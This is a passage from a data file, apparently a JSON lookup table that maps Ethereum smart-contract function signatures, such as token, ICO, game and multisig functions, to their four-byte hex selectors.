"0xb59dd856", "GetPlayerRound(address)": "0x82c7340e", "GetCardNumber(uint8,uint8)": "0x430de98a", "GiveRNG(uint256)": "0x834e0565", "_giveRNG(uint256,uint256)": "0x5256fcaf", "BTC10kon54()": "0xbac7c252", "ABI(bytes32)": "0x0b83de20", "AUTSCoin()": "0x9ddf65e1", "ChangeBonus(uint256)": "0xa1837d21", "ChangeEthPrice(uint256)": "0x38b59359", "TransferTokens(address,uint256)": "0x7cbfb8a5", "BerryToken()": "0x63385b64", "sendBackTokens()": "0x7bcc9c6f", "setStartBlock(uint256)": "0xf35e4a6e", "setEndBlock(uint256)": "0xc713aa94", "getTokenPerEth()": "0x8bb8b2db", "getWalletAddress()": "0x04d2dec6", "setTokenPerEth(uint256)": "0xa9c1873c", "isICOUp()": "0x0d494a05", "setMinInvestmentInWei(uint256)": "0x2e4216c1", "getMaxEtherToInvest()": "0xc3584d88", "JPPreICO()": "0x7b15013c", "doIssueTokens(address,uint256)": "0x3de33a32", "countUBetChecks()": "0x7798e525", "purchaseTokens(address)": "0xce557031", "getUBetCheck(address,address)": "0x5db3ffa5", "getUBetChecks()": "0x457556c2", "registerUBetCheck(address,string,string,string,uint256,string,int256)": "0x4dde8de6", "UBetCoin()": "0xe524d618", "DatGirl()": "0xf461847c", "YYBToken()": "0x8dd1e732", "ZBillionaire()": "0x37d3ec7a", "VirtualRealityChain()": "0x00d3f51a", "isExist(address)": "0x0013eb4b", "transfertoacc(string,uint256)": "0x984ce0fd", "ResetAllAmount()": "0x9eb6c932", "TransferToAllAccounts()": "0x9c978442", "GetUser(string)": "0x5a12b581", "SetAmount(string,uint256)": "0xbddac117", "SetAddress(string,address)": "0xb5fa77bd", "AddUser(string,address,uint256)": "0x1a860d91", "CharlieCoin()": "0xdfc6ffc6", "Buy(uint8,string)": "0xc7dfabcc", "Memes()": "0x5f51db02", "Crypseum()": "0xa1e3b16d", "CryptoCurrencyToken()": "0x2b62ef2a", "AbyssToken(address,address[],address)": "0x7c3eef61", "JCoin()": "0xc64d73c6", "getTotalHeartsByDappId(uint256)": "0x72d475db", "BWCHToken(uint256,string,string)": "0x9356b1fe", "change_time_stamp_status(uint256,uint256,string)": "0x44708f7d", "setTransferLock(uint256)": "0x7f81f0b9", "change_time_stamp(uint256,uint256)": "0xbfcc4ab2", "ETH_withdraw(uint256)": "0xaf862b6a", "change_tokenReward(uint256)": "0xe4c82881", "change_status(string)": "0x70c7e230", "change_symbol(string)": "0xf3200a1c", "change_name(string)": "0xe349cb12", "admin_token_add(uint256)": "0xe8c7df8a", "admin_token_burn(uint256)": "0x6c237c1c", "admin_from_To_transfer(address,address,uint256)": "0xddb792a0", "DOSXToken()": "0x4cbbb987", "updateExchangeRates(uint256)": "0xe54135ac", "_ownerOf(uint256)": "0x38350541", "_createPainting(address,uint256,uint256,uint8,uint8,uint256,uint256)": "0xc156ef6b", "_createOriginalPainting(uint256,uint256,uint256)": "0xac95a2aa", "canUserCancelArtwork(address,address)": "0x433d0f33", "canUserReleaseArtwork(address,address)": "0xb750948d", "setBitpaintingStorage(address,address)": "0xf2d06540", "_unpause()": "0xfc8234cb", "_pause()": "0x320b2ad9", "getPaintingArtist(uint256)": "0x1dea157f", "getPaintingName(uint256)": "0x32cb93d9", "canBeChanged(uint256)": "0x7d6979e7", "sealForChanges(uint256)": "0x1e801c8c", "secondarySaleCut()": "0x590731b7", "isSecondary(uint256)": "0x8ff6e971", "totalPaintingsCount()": "0x2efd08df", "isCanceled(uint256)": "0x39e3af9b", "decreaseSpeed(uint256)": "0x9e6afbda", "resetPainting(uint256)": "0x8635b527", "resetEditionLimits(uint256)": "0x4a61f347", "purgeInformation(uint256)": "0xa61bd76d", "movePlayer(uint8[176],uint8,uint8,uint8)": "0x5da6bf67", "getPosition(uint8[176],uint256)": "0xc05a8e81", "getPlayer(uint8[176],uint8,uint8)": "0x2a2f366c", "setBuilding(uint8[176],uint8,uint8,uint8)": "0x2da9b51e", "getBuilding(uint8[176],uint8,uint8)": "0xe3cd30f6", "moveOwner(uint256[3],uint256[4],uint8[176],bytes32,bytes32,uint8)": "0x657ad078", "distance(uint8,uint8,uint8,uint8)": "0x8b67ef19", "max(uint8,uint8)": "0x63d64159", "getNujaRegistry()": "0xca639025", "getCharacterNuja(uint256)": "0xedc3b4db", "getCharacterInfo(uint256)": "0x0d830190", "isStarterClaimed(address)": "0xd700ed39", "claimStarter(string,uint256)": "0xef3e8869", "addCharacter(string,address,uint256)": "0x8fe3579f", "CharacterRegistry()": "0x1a4b746f", "walletOf(address)": "0x1982640c", "walletLists()": "0xf6b91944", "anvlTechToken()": "0x46d95146", "tokenDistribution(address[])": "0x58f3a115", "updateCrowdfundState(uint256,address,uint256)": "0xc421fa8e", "purchaseToken(address)": "0xcd77a0c8", "addInvestor(address[])": "0x8fa32111", "_getTokenBonus()": "0x07e3ad2d", "Panax()": "0x8724e751", "AirDropper(address[],uint256[])": "0x4810034a", "unFreezeTransfers()": "0x9eb81bd0", "getNumberOfItems()": "0x730ef269", "sellItem(string,string,uint256,string)": "0x3b82fe0e", "addDoctor(uint32,string,string,string,uint8,uint8,uint8,uint8,uint8,uint16,uint64,uint64)": "0x6ca35ae4", "addMaster(uint32,string,string,string,uint8,uint8,uint8,uint8,uint8,uint16,uint64,uint64)": "0xc5d0c68b", "addUndergraduate(uint32,string,string,string,uint8,uint8,uint8,uint8,uint8,uint16,uint64,uint64)": "0x93a962fc", "store(bytes32,bytes32,bytes32)": "0x5d8f2640", "setContext(bytes32,address)": "0xa5214f77", "doEmit(uint256,uint256)": "0xabd7f8de", "doStore(uint256,uint256,bytes32)": "0xdd288173", "doPay(bytes32,uint256,uint256)": "0xdc94b4a4", "doThrow(uint256)": "0x0dee4af0", "getReturnedData()": "0x7f33375b", "put(bytes32,bytes32,bytes32)": "0x2e7bcc55", "setImplementation(bytes32,bytes32,address,bytes32)": "0xc29e8863", "executeAppReturn(bytes32)": "0xdd8ad12a", "balEth()": "0x61e5f5f2", "submitBlockHeader(bytes)": "0xc14e9f58", "submitFakeHeader()": "0xe75705c7", "RemoveAllHeaders()": "0xf13ad3bf", "indexOf(uint256[],uint256)": "0x6457237b", "encodeBytes(bytes,uint8)": "0x2b5f227e", "multiInvokeWith3Args(address,string,address[],address[],uint256[])": "0x127cf0b9", "multiInvokeWith2Args(address,string,address[],uint256[])": "0x99552af1", "multiTransferFrom(address,address[],address[],uint256[])": "0xf30a7166", "multiApprove(address,address[],uint256[])": "0xdad39151", "multiTransfer(address,address[],uint256[])": "0x1ca0a28d", "multiAllowance(address,address[],address[])": "0xd2d3b8e0", "multiBalanceOf(address,address[])": "0x9f166cf1", "INTEGROToken()": "0xc6bcd5f7", "Creedex()": "0x74818530", "StreamToken(uint256)": "0xb8198875", "GetChallengeTimings(uint256)": "0xfa4f34a0", "GetChallengeBetsInformation(uint256)": "0xa038af35", "dollcoin()": "0xe45bc0ae", "Erc20Token(string,string,uint8,uint256)": "0xf2f3a1d2", "TravelHelperToken(address,address,address,address,address,address)": "0x4277e823", "mint(uint32,uint32,uint32)": "0x3adbb3a4", "_mint(address,uint32,uint32,uint32)": "0x8a5c9098", "victorieumToken()": "0xcd42693d", "receiveToken()": "0xe9ba77fb", "distributeUsingVaults(uint256,uint256,uint256,address)": "0x8c2f04d9", "estimateDistribution()": "0x971bd1b4", "LPAIToken()": "0x9d2870c3", "countStudentRequest()": "0xf3316ef5", "countCourse()": "0x488981cd", "addCourse(uint256,string,uint256,uint256,string,string)": "0xd3bc9aca", "Certification()": "0x14698895", "VCFToken()": "0xa0dd678b", "EcoCrypto()": "0x35f1bd11", "TechnoEng()": "0xdbfdef01", "wthdraw(address,uint256)": "0x75759319", "saleHero(uint256)": "0x51d5f44f", "buyHero(uint256)": "0x024edd75", "snatchHero(uint256)": "0x642c7aa2", "_mint(string,uint256)": "0x665b1bc0", "getTokenByMineID()": "0xd0cb874a", "ModifyMine(uint256,bool,string,uint256)": "0x1fd7b802", "RegisterMine(string,uint256)": "0x610efc86", "EVA(uint256)": "0x432f0d20", "TEAM()": "0xcecdc6aa", "reward(address)": "0x6353586b", "sendEther(address,address,uint256)": "0x3885fd3d", "RewardWallet(address,address,address,uint256)": "0x4f8da1fe", "MFNToken()": "0xe4254585", "allocateNominalToken(address,uint256)": "0xdf294cad", "allocateTokenETHConvert(address,uint256)": "0x7219dd7f", "transferETHtoContract(uint256)": "0x4e9ec8a6", "ETHbalanceOf(address)": "0xc41559bb", "allowRefunds(bool)": "0x8769c281", "buyAsset(uint256)": "0x110d35b8", "updateForSale(uint256)": "0xfc14ed71", "updateAsset(uint256,string,uint256,uint256)": "0xa0417c9a", "createAsset(string,uint256,uint256)": "0x49ead9b4", "getAssetsCount()": "0x0aac5dfd", "ico1Ended()": "0x3158f643", "icoEtherMaxCap()": "0x847927ed", "minSumICOStage4USD()": "0xe2726e94", "firstCheckpoint()": "0x3879aa23", "perAmountRaised()": "0xa9db06e5", "customerWallet()": "0x20fd8861", "tier_rate_4()": "0x0be924ef", "allowedGasPrice()": "0xcc8ce862", "generalTokens()": "0x6d98571a", "remainingSupply_()": "0xa4534ef7", "targetToAchieve()": "0xb2a87fc3", "heapSort(uint256[])": "0xb396d7ad", "toggleDrop()": "0x9be0fc75", "initialHolder()": "0xb72218e3", "tokenFeeMin()": "0x7c1f9d5e", "expirationTimestamp()": "0x9f43ddd2", "lethalBonusAtHits()": "0x0dfbdcc5", "finishPreICO()": "0x1167ecb2", "PRICE_PREBUY_BONUS()": "0xcfcdde19", "PRICE_STAGE_TWO_BONUS()": "0xd7b12f38", "ADVISOR_TWO()": "0xdf969bc0", "totalTokensPurchased()": "0xa277d5b1", "minimalCap()": "0x36f26095", "totalWeiRecieved()": "0x83edf023", "TOTAL_TULIP_SUPPLY()": "0x298c61e3", "countryWinnerID()": "0xdb1d68b5", "maxTokenAmount()": "0x8a926d0f", "product4_sell()": "0xc279d042", "qtyInitiators()": "0x1c624a60", "amountRaisedIsc()": "0xbeeb1b5d", "totalSaleCap()": "0x8d578bee", "reveralSupply()": "0xa0a4cb6c", "destTokensTeam()": "0x85cc51c2", "locked_funds_for_revealed_spins()": "0x799f0c5d", "TOKEN_AMOUNT_ICO_STAGE2()": "0x51548a2d", "bountyTokenAllocation()": "0x9269e464", "MIN_FUND_AMOUNT()": "0xa5e558a3", "rlc_bounty()": "0x97eb147d", "termsNumber()": "0x99b55343", "playNo()": "0xc5ff2222", "getIcoInvestorsAddressesCount()": "0x930cd62e", "price3()": "0xd778c911", "unknownReserved()": "0x3840d63d", "originalTotalSupply()": "0xdf8f4eb7", "initialAuctionDuration()": "0xc50508de", "activeStakes()": "0xed2f2369", "totalForMining()": "0xcaaacb12", "teamOneDivsUnclaimed()": "0x6ec069f8", "get_CountAllHolderForProfit()": "0xc6bd62f5", "afterCrowdsaleAddress()": "0x97d32a12", "icoFinishedAt()": "0x7d9a9096", "durationOfLock()": "0x4da1397c", "willChangeCost()": "0x981b405b", "nextTradeEvent()": "0xa504bd0d", "weiPerBlock()": "0x44c73459", "isDisabled()": "0x6c57f5a9", "pendingWithdrawal()": "0x7e288822", "maxWeiTier3()": "0x3cef51c5", "totalSupplyAtCheckpoint()": "0x87a9a8ef", "gemFab()": "0xab6d8a9a", "wordlist()": "0x2e02583c", "confirmRewardsWithdrawal()": "0x935814a6", "weiPerRtc()": "0x0d0b8825", "issuerDistributedUnits()": "0xc122759f", "phaseTwoRate()": "0x7aa356af", "balanceB()": "0x32733a08", "playerInDraw()": "0x29678a53", "HUT34_VEST_ADDR()": "0x0d61a4ff", "amountOfItem()": "0xb5e54406", "boughtNum()": "0xf1018c6f", "lastBlock_a9()": "0xd7d49532", "currentGenesisAddresses()": "0x97b4ddac", "commissionRate()": "0x5ea1d6f8", "isAborted()": "0xfe4caa64", "rateAngel()": "0x47eacc78", "ADV_TEAM_TOKENS()": "0x32a8d49e", "fundsTreasury()": "0x39f5b6b6", "totalPopulation()": "0x25d85e12", "resetBeneficiaryList()": "0x61c76231", "deployerHash()": "0x92a70c42", "voitingStartTime()": "0xb70b9717", "totalReserve()": "0x4c68df67", "withdrawalEnabled()": "0xf8ea5daf", "strikersBaseContract()": "0xd36a35c9", "valueToken()": "0xeffff82f", "contractFailed()": "0x516e7be7", "foreground()": "0x904aaf8f", "neglectOwner()": "0x5a5ec54a", "bonusPreICO()": "0xeb5edde3", "treefs()": "0x72e38003", "roundPot()": "0x3ccb47cb", "jackpotLarge()": "0xe8c5ff96", "instructions()": "0x30bbb55e", "team_address()": "0x8f32cf0c", "ask()": "0x4a896384", "MANAGE_CAP_PER_ROUND()": "0x9906352f", "incentiveDistributionStarted()": "0x03bbba93", "GetCurRoundInfo()": "0x1a2ad007", "VESTING_2_DATE()": "0xcb5fe36e", "startMintingData()": "0xf76ffe7a", "fourthTime()": "0x12da6e2b", "FAILED_STATUS()": "0x61bd12e0", "currentBet()": "0xd504cb65", "RoundAHardCap()": "0x38d33337", "phxCoin()": "0x71ef0d0f", "totalRelease()": "0xbab7b237", "fundsTokensHaveBeenMinted()": "0x5cec4cb9", "saleAgent2()": "0x4bf5ac36", "gemAttackConversion()": "0x5c7b0288", "burnedCount()": "0x7cefcc52", "owner_balance()": "0xa581a27a", "STORAGE_WALLET()": "0xe91ff7ca", "zoDailyLimit()": "0x00e62620", "PendingETH()": "0xfd2e9caf", "presaleCapReached()": "0x9a95ca48", "getLuckyRecordSize()": "0xe1021b53", "MIN_PRICE_IN_CENTS()": "0x17eba34d", "bonusPhase2()": "0xade645fa", "DEFROST_INITIAL_PERCENT()": "0x74f79c8e", "stage2Tokens()": "0x49661fcf", "totalTokenCount()": "0x764912ef", "numShareholders()": "0x68eca613", "GetMaximumBet_Ether()": "0x1682fa59", "marketCapRed()": "0xca64cd34", "priceInUsd()": "0x5310f0f4", "oraclizeMinCallbackGas()": "0xc73b187d", "revertFunds()": "0xbb3f5330", "totalTokensReceived()": "0x71586383", "redeemPrice()": "0x7a233fb3", "summFoundersShare()": "0xef47492b", "ICOPrice()": "0x59dd35da", "ethSignedMessagePrefix()": "0x5f647d5a", "verificationFee()": "0xa8c278a2", "euroLock()": "0x87055008", "STAT_MAX()": "0x4e3dc2f1", "ThreeDLPrivate()": "0xcef9ca6b", "updateETH()": "0x1bd0c431", "minter2()": "0x55f14c30", "addressOfERC20Tocken()": "0x8e111ef6", "startIcoPreICO2ndRound()": "0x29bd028a", "discountedIcoStartBlock()": "0xe3c6e66d", "exchangeableTokensFromSale()": "0xe69b9b65", "getClaimable()": "0xee28b744", "result_block()": "0x494d93cc", "destTokensReserve()": "0xd7e07d5f", "unsoldTokensVault()": "0xcc121ac1", "devCutPercentage()": "0x21194bc0", "addChunk3ToWhiteList()": "0x2cbdb5fb", "soldPresale()": "0x4e21f25e", "fallbackTriggered()": "0xacf94ed5", "dateTimeAddr()": "0xd2c5ce31", "disableTokenIssuance()": "0x4e860ebb", "noOfPhases()": "0xa0edc204", "pricePerTokenInWei()": "0xdf520efc", "contract_admin()": "0x6da36c06", "isLoanFunded()": "0x02065fb8", "secondBonusSalesEnds()": "0xad48636a", "altCapitalization()": "0x7785859f", "INITIAL_EMISSION_FACTOR()": "0xb88d0169", "_price_tokn_ICO_first()": "0xbbbc0f55", "exchangeState()": "0x0dd27120", "_tokens()": "0x8970d84c", "isBurn()": "0x2d067d4c", "foundationBoard()": "0x01836037", "futureSaleVault()": "0x09bf6e42", "icoLtc()": "0x2d349a1f", "Term()": "0x0a5988a8", "garanteSystemDepositInAllFunds()": "0xf2dd6585", "maximumIndividualCap()": "0x61e360b7", "SHARE_BOUNTY()": "0xf4f5e1c1", "COMMUNITY_PERCENTAGE()": "0x287301c1", "BAG_TRANSFER_FEE()": "0xf17a1ff5", "minBlockGap()": "0x8308c786", "variation()": "0xe015d863", "teamb()": "0x89f63f50", "toggleDrain()": "0xeda5de7c", "maxSubdivisions()": "0xdf3a4fa1", "publicSaleAmount()": "0x8985abc8", "requiredTokenAmount()": "0x29d428ca", "phase1Rate()": "0xd76b6095", "teamReservation()": "0x10e6d3c9", "numberOfParticipants()": "0x7417040e", "lockTimeout()": "0x8711e4a9", "MinStarIndexAvailable()": "0xf9b2ec8e", "round_c_begin_date()": "0x81cd30a8", "finalizeType()": "0x48d26dd1", "BAInvestor()": "0xbc71cdcb", "icoPhaseTimeInterval()": "0xb7f84ae2", "rbInformationStore()": "0xec74b818", "MINIMUM_BET()": "0x935aae40", "TeamAdvisorsWallet()": "0xc3328816", "clnAddress()": "0x451cd22d", "profitsLockedUntil()": "0x90ac7588", "currentNiceGuyIdx()": "0x32d79689", "RESERVED_TOKENS_FOR_ICO()": "0x630e07f1", "volumeType5()": "0xec76bd65", "thisIsFork()": "0x699f1fa9", "end_ICO_PreICO()": "0x8a8146d0", "COMM_SUPPLY()": "0x20a09dec", "minThreshold()": "0xc85501bb", "submitTransactionWithSignatures(address,uint256,bytes,uint256,uint8[],bytes32[])": "0x9119e5fb", "isConfirmed(bytes32)": "0x6486aa51", "transactions(bytes32)": "0x642f2eaf", "updateRequired(uint256)": "0x607fa5a4", "confirmationCount(bytes32)": "0x59bf77df", "submitTransaction(address,uint256,bytes,uint256)": "0x0d59b564", "confirmations(bytes32,address)": "0x0c4ecab4", "accountLevelsAddr()": "0xf3412942", "feeTake()": "0xc281309e", "orders(address,bytes32)": "0xbb5f4629", "feeRebate()": "0x731c2f81", "feeMake()": "0x57786394", "orderFills(address,bytes32)": "0x19774d43", "geneScience()": "0xf2b47d52", "gen0CreatedCount()": "0xf1ca9410", "saleAuction()": "0xe6cbe351", "PROMO_CREATION_LIMIT()": "0xdefb9584", "erc721Metadata()": "0xbc4006f5", "autoBirthFee()": "0xb0c35c05", "kittyIndexToOwner(uint256)": "0xa45f4bfc", "cooldowns(uint256)": "0x9d6fac6f", "secondsPerBlock()": "0x7a7d4937", "setSaleAuctionAddress(address)": "0x6fbde40d", "GEN0_CREATION_LIMIT()": "0x680eba27", "kittyIndexToApproved(uint256)": "0x481af3d3", "sireAllowedToAddress(uint256)": "0x46116e6f", "setGeneScienceAddress(address)": "0x24e7a38a", "siringAuction()": "0x21717ebf", "GEN0_AUCTION_DURATION()": "0x19c2f201", "pregnantKitties()": "0x183a7947", "setSiringAuctionAddress(address)": "0x14001f4c", "GEN0_STARTING_PRICE()": "0x0e583df0", "cfoAddress()": "0x0519ce79", "bets(bytes32)": "0xc902c3ae", "totalWon()": "0xb3ff277d", "betsKeys(uint256)": "0x71d0ed05", "investorsProfit()": "0x66aee0fc", "investorsLosses()": "0x6128a4f3", "amountBets()": "0x5ce49fbf", "isStopped()": "0x3f683b6a", "getProfits()": "0x3ad15258", "amountWon()": "0x28102e54", "computeInitialPrice(uint256)": "0xcd066fd6", "buyZone(uint256)": "0xbee712da", "transferContractOwnership(address)": "0xa843c51f", "transferZone(uint256,address)": "0x88806b37", "sellZone(uint256,uint256)": "0x159d3c24", "getZone(uint256)": "0x11ee0ec5", "totalDeposited()": "0xff50abdc", "master()": "0xee97f7f3", "lastPayouts(uint256)": "0xeb508932", "dispatchGains()": "0xe65b743e", "refereesCount(address)": "0xe32ef3c5", "setGainsRate(uint256)": "0xe07959bd", "referedRateBonus()": "0xd9f300ce", "getAccountReferalsStats(address)": "0xd388e416", "depositsStack(uint256)": "0xd18a5563", "addressGains(address,address)": "0x11b7d483", "setActive(bool)": "0xacec338a", "refereeInvitations(address)": "0x98f6c7e5", "refereds(address)": "0x80abb85b", "totalGains()": "0x7ffb8577", "getnumDeposits()": "0x725e70a3", "getLastPayouts()": "0x7124abf3", "inviteReferee(address,address)": "0x6a0d017c", "getMaster()": "0x5a99719e", "getContractMetrics()": "0x5681e00b", "refereesRateBonus()": "0x55139163", "profitsRatePercent()": "0x53d3eeee", "getAddressGains(address)": "0x411735ee", "getPayout(uint256)": "0x3e56f9f9", "lastDeposit()": "0x36b77107", "getEarliestPosition(address)": "0x33920f65", "getCurrentPayoutIndex()": "0x252d7eb3", "feesRate()": "0x127043c3", "addressPositions(address,address,uint256)": "0x0819815e", "pendingReferals(address)": "0x12179a2d", "computeGainsRate(address)": "0x059b8c77", "active()": "0x02fb0c5e", "getMyEntityParents(uint256)": "0xf9672443", "releaseMe(uint256)": "0xf66302a2", "isEntity(uint256)": "0xd7a42b54", "deleteEntity(uint256)": "0xcb9e2755", "updateEntity(uint256,bytes32,uint256,bytes32,uint256)": "0xc8ea1f7f", "authority()": "0xbf7e214f", "EntityCount()": "0xbd0fda3d", "myEntityList(uint256)": "0xb8261f8f", "getUserCount()": "0xb5cb15f7", "getEntity(uint256)": "0xb3a27842", "getUser(uint256)": "0xb0467deb", "userList(uint256)": "0x9f4216e8", "getMyEntitySimple(uint256)": "0x99aef94a", "setAuthority(address)": "0x7a9e5e4b", "stopped()": "0x75f12b21", "setFundsWallet(address)": "0x64e39b87", "newEntity(bytes32,bytes32,uint256,uint256)": "0x54ca9095", "updateEntityName(uint256,bytes32)": "0x54a0ebf5", "myEntityStructs(uint256)": "0x4cbe552c", "getMyEntityOwner(uint256)": "0x49e6c454", "updateMyEntity(uint256,bytes32,bytes32,bool,address,uint256,uint256)": "0x41696fa8", "addReview(string,uint256,address)": "0xbf49d120", "Store(string)": "0x4f9c5253", "func()": "0xbfa814b5", "finalSendTokens()": "0x4dc18c02", "holdTokenInvestorsCount()": "0x6bf42646", "withdrawal(address)": "0x96131049", "getTimeBonus(uint256)": "0xc3182360", "getCountBonus(uint256)": "0xc2b4ab4d", "sendTokens(address,uint256)": "0x05ab421d", "removePromo(bytes32)": "0x629d93db", "addPromo(bytes32,uint256,address,uint256,uint256)": "0xa6980a17", "_findpos(uint256,uint256)": "0x57597321", "_find(uint256)": "0x1a85bd57", "_buys(uint256,uint256)": "0xd8ee2ff4", "isOfferSorted(uint256)": "0xd2b420ce", "getNextUnsortedOffer(uint256)": "0x61f54a79", "getFirstUnsortedOffer()": "0x8af82a2e", "getBetterOffer(uint256)": "0x911550f4", "getWorseOffer(uint256)": "0x943911bc", "setMatchingEnabled(bool)": "0x2aed1905", "setBuyEnabled(bool)": "0xd6f15469", "del_rank(uint256)": "0x467f0b7b", "MatchingMarket(uint64)": "0x9bb186d2", "ExpiringMarket(uint64)": "0x7f290d2d", "rpow(uint256,uint256)": "0x8f907195", "rdiv(uint256,uint256)": "0x0e2286d3", "wdiv(uint256,uint256)": "0x5fde731c", "rmul(uint256,uint256)": "0x67457022", "wmul(uint256,uint256)": "0x8b9af5c1", "testF4(uint256)": "0x48ff0c47", "testF3(uint256)": "0x4d3915e9", "testF2(uint256)": "0xc5ea01c9", "testF1(uint256)": "0x09bd1d41", "testPrintableToken()": "0xfe211279", "named(string)": "0xf05d5547", "updateInfo(uint256)": "0x316db7f2", "addDemoData()": "0x9416893b", "amountOfLegs()": "0x4837e2fa", "ContributionMock()": "0x9d74fb7c", "getLastOrderId()": "0x68a52509", "getOrder(uint256)": "0xd09ef241", "cancelOrder(uint256)": "0x514fcac7", "settleOrder(uint256,uint256)": "0xfa25fd57", "makeOrder(address,address,uint256,uint256)": "0xe68fb207", "andTheWinnerIs()": "0x4fd6e8ac", "OddsAndEvens()": "0xdf77a290", "MockUpgradeableToken()": "0xaf03e856", "Multiplication(int256)": "0x92d68619", "getMemberAtIndex(uint256)": "0xf8024d10", "removeMember(bytes32)": "0xb9c2c6fb", "addMember(bytes32,address)": "0x4092e2c2", "Team(bytes32,bytes32,address,bytes32)": "0xaa0f0d4a", "_checkVotes(address)": "0x10ccbbdb", "_updateMargins()": "0x614af914", "_removeProposal(address)": "0x8e0294a8", "wipeProposedActions()": "0x4b54d131", "setMaximumVotingWindow(uint256)": "0xf336e80a", "setMinimumVotingWindow(uint256)": "0x940aa73f", "setMarginForVictoryPercent(uint8)": "0x0fd1ed1f", "setQuorumPercent(uint8)": "0x9239520b", "withdrawProposedAction()": "0x1a433daf", "proposeAction(address)": "0x6e2da4b3", "DirectDemocracy()": "0xacc02119", "oldExecuteDecayFunction(uint256,int256,int256,uint256,uint256)": "0x61794267", "ExponentialDecayingTokenFunction()": "0x34457cbe", "decodedExpiration()": "0x5692e367", "decodedSecret()": "0x46cc43fb", "decodedLocksroot()": "0xe8862924", "decodedAmount()": "0x68788868", "decodedRecipient()": "0xb3ef0045", "decodedAsset()": "0x09d7e9ca", "decodedNonce()": "0xe9a78a1e", "testDecodeTransfer(bytes)": "0x251481c8", "DecoderTester(address,address,address,address,uint256)": "0x24a4411d", "sendSeedAndHash(string)": "0xfb4b7693", "sendOnlyHash(string)": "0xc3f6e09c", "testEqual()": "0xcb945312", "ThirdPartyVoter()": "0xaa8d11e3", "handleRefundRequest(address)": "0xbd963442", "initialize(address,address,uint256,uint256,address,address,address,address,address,address,uint256)": "0x8733f360", "StatusContribution()": "0xa24dbe76", "setBalance(address,address,uint256)": "0xb5c9cbbe", "getUserBalance(address)": "0x47734892", "createBATokenContract(address,address,uint256,uint256)": "0x104bf512", "BATokenFactory()": "0xb7d5ef4d", "withdraw(uint80)": "0xab9cd37e", "setTradingOpen(bool)": "0x21c03a97", "GxCoin(address)": "0xfa8fc08d", "FundManager()": "0x57f6280e", "setPermission(address,uint8)": "0xdd5ddfe8", "isFundManager()": "0xca3e5333", "Doug()": "0xc7deda22", "setDougAddress(address)": "0x80e2653e", "getScriptAction(bytes,uint256)": "0xbe5eb443", "getScriptActionsCount(bytes)": "0x6845950f", "uint32At(uint32,bytes,uint256)": "0x22ee1db4", "runScript(bytes)": "0x807b08c7", "test_increaseBlockNumber30211()": "0xc9c8ffd2", "test_someOtherFalseTest()": "0x41cfbb96", "test_increaseBlockBy5000()": "0x4ce63074", "BONUS_SLAB()": "0x4051ed26", "oneTokenInEurWei()": "0xc6a2573d", "theCamp()": "0xe31f4263", "minMillPurchase()": "0x953a03ca", "noteChainFee()": "0x78e95645", "itemKindCount()": "0x0377ebe8", "walletFacebook()": "0x1464bc45", "isSetTeamWallet()": "0x66b62bde", "roundId_()": "0xe55db48e", "currentDividendAmount()": "0x6e39891c", "tradeFee()": "0x24bcdfbd", "DATE_TOKENS_UNLOCKED()": "0x20df7f35", "ownersGeneration()": "0xb25bb3a7", "developerPctX10()": "0x9f8f4c45", "caller_()": "0xc2f490e9", "PRESALE_STAKE()": "0x8d93758e", "bonusInPhase1()": "0xdc35ea16", "delayOfPreICO()": "0xf0b5165f", "ADVISOR_THREE()": "0xc1929d8c", "wpr()": "0x0747e4eb", "marketor()": "0x84afb526", "capFlex()": "0xdd34c9a3", "tokenOnlyDeploymentCost()": "0xc53abe29", "last_win_wei()": "0xe0c2dcbd", "scrapCounter()": "0x4866352b", "initialSaleComplete()": "0xec2cdb87", "paymentId()": "0x25bd4639", "admin_address()": "0xf2e62772", "totalCapitalization()": "0xd7f7582c", "firstPrivateLockedAmount()": "0x1cae947a", "maximalInvestmentTimeTreshold()": "0x013130c0", "largestHODLERAddress()": "0xed8d806b", "makeLiquidCor()": "0xc21e5712", "COMMUNITY_ADDRESS()": "0xd3f189bd", "numWhitelistedInvestors()": "0x9fed39c5", "total_refunded()": "0x7e7f1bfd", "tokenPriceNum()": "0xcea024d9", "napkinPrice()": "0x4414d940", "genCode()": "0xaefa573d", "ethOdinRate2()": "0xbaa79dd3", "ispackagesaleClosed()": "0x305094ab", "descriptionHash()": "0x85dcee93", "allocationAddressICO()": "0x8df41c32", "blocksToVest()": "0xc092ecf4", "GobizToken()": "0x1701feaa", "signalCount()": "0xae0041aa", "p2()": "0x81d01ed3", "presaleTokenRate()": "0xcdc0563a", "RPESALE_TOKEN_SUPPLY_LIMIT()": "0xb6898845", "soldCards()": "0x638b9119", "usedPaymentSupply()": "0x60d1c056", "mainIcoStartBlock()": "0x7ed7101d", "oracleInterfaceCountdown()": "0xa48cef4a", "indexLastThreads()": "0xc3c6e202", "walletForBounty()": "0x086a1b86", "secsPerBlock()": "0x7e7c16de", "coinIssuedRewardPool()": "0x54244518", "increaseProfit()": "0x30cc248e", "ETHDeposir()": "0x741bd9c8", "PRIVATE_STAGE_FINISH()": "0x0eb523ac", "finalBonus()": "0xaee7e176", "priceInc()": "0xbaaefe5b", "miningToken()": "0x69cf7ac3", "bonusCRS()": "0x88ea8ee5", "networkId()": "0x9025e64c", "getLastGames()": "0x760163af", "zoomraffleFee()": "0xe399daab", "winningScore()": "0x546216f1", "TDEStartDate()": "0xa785b96a", "TOKEN_VERSION()": "0x32892177", "floorId()": "0xc48ef17c", "RoundBHardCap()": "0x5b8c6b58", "feeFixed()": "0x0e3d2202", "nextmarketoffer()": "0x4270d48a", "limitDateCrowdWeek3()": "0xc832b00d", "SALE2_END()": "0x69132f72", "withdrawArbFunds()": "0x48338756", "StgThreebonusEnds()": "0x58ecaa45", "allowNewStakes()": "0x211db50d", "mintingNonce()": "0xfbb0eb8b", "bank1Val()": "0x402456c0", "maximumBidAllowed()": "0xf11f7d2d", "Team()": "0x639e01dd", "getMinPriceSale()": "0xc0c91e6d", "ADVISORS_ADDRESS()": "0x0f9bac2d", "travelPrice()": "0x1253b82f", "howManyShips()": "0xf67e3d0d", "PURCHASER_MAX_TOKEN_CAP_DAY1()": "0x53fe7a59", "WEI_PER_USD()": "0x32bbc1c8", "releaseFinalizationDate()": "0x6748a0c6", "_startBlock()": "0x2c71ecb6", "COMPANY_RESERVE_FOR()": "0xe3256429", "totalMfr()": "0xe75f6e21", "EXCHANGE_RATE()": "0x14a8bd0d", "ownerWithdrawETH()": "0x27a910dc", "stillAvailable()": "0x32aba656", "m_startTimestamp()": "0x46ffb216", "getPresaleInfo()": "0x767fa723", "Transfer_nodata_enabled()": "0x4511cc7d", "devFeeRate()": "0x1ae3a94a", "minPurchaseInEth()": "0x86271d8b", "shareCycle()": 